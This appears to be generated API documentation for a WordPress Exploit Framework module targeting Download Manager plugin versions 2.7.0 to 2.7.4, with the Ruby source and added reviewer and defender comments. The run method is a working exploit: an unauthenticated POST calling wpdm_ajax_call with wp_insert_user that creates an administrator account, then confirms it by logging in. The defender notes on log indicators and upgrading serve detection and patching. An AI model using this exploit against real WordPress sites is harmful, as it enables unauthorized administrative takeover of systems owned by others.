Class: Wpxf::Auxiliary::DownloadManagerPrivilegeEscalation
- Includes:
- Wpxf, WordPress::Login
- Defined in:
- lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb
Constant Summary
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary
- #check ⇒ Object
- #initialize ⇒ DownloadManagerPrivilegeEscalation (constructor): A new instance of DownloadManagerPrivilegeEscalation.
- #password ⇒ Object
- #run ⇒ Object
- #uploads_url ⇒ Object
- #username ⇒ Object
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ DownloadManagerPrivilegeEscalation
Returns a new instance of DownloadManagerPrivilegeEscalation.
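# File 'lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb', line 9

# Builds the module: records its metadata and registers the two credential
# options that #username and #password read back.
#
# The metadata names the affected range as Download Manager 2.7.0 to 2.7.4
# and cites EDB 35533 and WPVDB 7706. Both option defaults are produced by
# Utility::Text.rand_alpha when the instance is created (length 10 for the
# username, 10..20 for the password, going by the arguments passed).
def initialize
  super

  update_info(
    name: 'Download Manager Privilege Escalation',
    desc: 'The Download Manager plugin, in versions 2.7.0 to 2.7.4, '\
          'allows unauthenticated users to create new admin users '\
          'due to lack of validation wpdm_ajax_call_exec.',
    author: [
      'Mickael Nadeau', # Vulnerability discovery
      'rastating'       # WPXF module
    ],
    references: [
      ['EDB', '35533'],
      ['WPVDB', '7706']
    ],
    date: 'Dec 3 2014'
  )

  # Hand the option list to Options#register_options. A bare parenthesised
  # array here would be built and discarded, leaving 'username' and
  # 'password' unknown to normalized_option_value.
  register_options([
    StringOption.new(
      name: 'username',
      desc: 'The username to register with',
      default: Utility::Text.rand_alpha(10)
    ),
    StringOption.new(
      name: 'password',
      desc: 'The password to register with',
      default: Utility::Text.rand_alpha(rand(10..20))
    )
  ])
end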
Instance Method Details
#check ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb', line 50

# Version check for the Download Manager plugin, delegated to
# WordPress::Fingerprint#check_plugin_version_from_readme.
#
# NOTE(review): the two version strings presumably mean "fixed in 2.7.5" and
# "introduced in 2.7.0", which matches the 2.7.0 to 2.7.4 range given in the
# module description; confirm against the helper's signature.
#
# @return [Object] whatever the fingerprint helper returns
def check
  plugin_slug = 'download-manager'
  version_bounds = ['2.7.5', '2.7.0']
  check_plugin_version_from_readme(plugin_slug, *version_bounds)
end
#password ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb', line 46

# Reads the 'password' option through normalized_option_value.
#
# @return [Object] the normalized value of the 'password' option
def password
  option_name = 'password'
  normalized_option_value(option_name)
end
#run ⇒ Object
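# File 'lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb', line 58

# Sends the account-creation request, then verifies the result by logging in.
#
# A single POST goes to full_uri with action=wpdm_ajax_call and
# execute=wp_insert_user, asking for an account with the administrator role.
# The outcome is decided only by whether wordpress_login succeeds with the
# same credentials, not by the response code or body.
#
# Defender notes: that parameter pair in an unauthenticated POST body is the
# request to look for in logs that capture request bodies, alongside
# administrator accounts that nobody on the site created. #check passes
# '2.7.5' as a version bound, which suggests upgrading to 2.7.5 or later
# is the remedy (confirm against the plugin changelog).
#
# @return [Boolean] true when the login with the new credentials succeeds;
#   false when the inherited checks fail, no response arrives, or the
#   login fails
def run
  return false unless super

  emit_info 'Creating new admin user...'
  res = execute_post_request(
    url: full_uri,
    body: {
      'action' => 'wpdm_ajax_call',
      'execute' => 'wp_insert_user',
      'user_login' => username,
      'user_pass' => password,
      'role' => 'administrator'
    }
  )

  # Guard before the first use of res. Placed after the login check, this
  # test could never run, and a nil response would raise on res.code.
  if res.nil? || res.timed_out?
    emit_error 'No response from the target'
    return false
  end

  # The second argument presumably marks these as verbose-only output.
  emit_info "Response code: #{res.code}", true
  emit_info "Response body: #{res.body}", true

  emit_info 'Verifying new account...'
  unless wordpress_login(username, password)
    emit_error 'Failed to create new user'
    return false
  end

  # The password is written to the module output in clear text, so any
  # captured console output or log holds a live credential.
  emit_success "User #{username} with password #{password} successfully created"
  true
end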
#uploads_url ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb', line 54

# Builds the URL of the plugin's files directory below wp-content by joining
# wordpress_url_wp_content with 'uploads' and 'download-manager-files'.
# None of the other methods shown for this class call it.
#
# @return [Object] the result of normalize_uri for those segments
def uploads_url
  sub_path = ['uploads', 'download-manager-files']
  normalize_uri(wordpress_url_wp_content, *sub_path)
end
#username ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb', line 42

# Reads the 'username' option through normalized_option_value.
#
# @return [Object] the normalized value of the 'username' option
def username
  option_name = 'username'
  normalized_option_value(option_name)
end